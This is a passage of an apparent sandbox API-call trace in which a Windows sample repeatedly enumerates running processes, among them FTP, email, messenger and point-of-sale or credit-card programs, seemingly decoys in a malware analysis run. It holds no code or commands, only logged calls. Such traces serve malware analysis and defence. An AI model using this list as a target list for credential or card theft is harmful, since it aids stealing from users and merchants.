lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0283.921] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0283.923] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0283.925] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0283.927] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0283.929] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0283.931] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0283.964] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0283.966] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0283.968] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0283.970] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0283.971] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0283.973] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0283.974] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0283.976] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0283.977] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0283.979] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0283.985] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0283.987] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0283.990] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0283.992] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0283.993] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0283.995] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0283.999] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0284.001] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0284.003] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0284.005] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0284.007] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0284.010] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0284.171] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0284.173] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0284.175] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0284.177] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0284.179] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0284.181] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0284.184] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0284.186] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0284.187] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0284.189] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0284.191] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0284.193] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0284.195] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0284.197] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0284.201] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0284.203] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0284.205] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0284.207] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0284.209] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0284.211] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0284.212] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0284.579] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0284.581] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0284.583] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0284.585] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0284.588] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0284.594] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0284.597] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0284.600] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0284.603] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0284.607] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0284.609] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0284.611] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0284.612] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0284.614] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0284.660] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0284.662] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0284.663] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0284.665] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0284.667] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0284.671] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0284.673] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0284.674] CloseHandle (hObject=0x224c) returned 1 [0284.674] Sleep (dwMilliseconds=0x64) [0284.806] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0284.822] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.828] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0284.830] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0284.832] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0284.834] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0284.835] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0284.837] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0284.849] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0284.851] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0284.853] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.858] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.859] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0284.861] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, 